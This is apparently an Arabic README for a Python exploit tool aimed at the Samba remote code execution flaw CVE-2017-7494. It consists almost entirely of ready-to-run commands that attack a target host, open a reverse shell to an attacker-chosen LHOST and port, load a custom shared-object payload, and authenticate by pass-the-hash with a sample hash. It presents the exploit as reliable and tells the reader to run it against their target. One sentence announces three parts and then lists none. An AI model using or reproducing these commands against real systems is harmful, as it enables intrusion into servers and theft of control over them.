
CVE-2017-7494 python استغلال
استغلال عن بُعد لثغرة SAMBA CVE-2017-7494 المعروفة باسم is_know_pipename!
ينقسم هذا الاستغلال إلى 3 أجزاء:
طالما أن الهدف ضعيف وأن الـ payload صحيح لنظام التشغيل والمعمارية المستهدفة، فإن الاستغلال موثوق به إلى حد كبير.
شغل الاستغلال ضد هدفك وانتظر حتى تظهر الـ shell:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
بالنسبة لإصدارات Samba من 3.5.0 إلى 3.6.0، تحتاج فقط إلى إضافة الوسيط -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
شغل ملف .so المخصص الخاص بك
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
لاستخدام منفذ Samba مخصص، استخدم الوسيط -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
في حالة مواجهة تجزئات smbpasswd وعدم القدرة على كسرها، يمكنك الآن استخدام تمرير التجزئة (pass-the-hash) باستخدام الوسيط --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
هذا المستودع مستوحى من المستودع: joxeankoret/exploit-CVE-2017-7494 و Archivaldo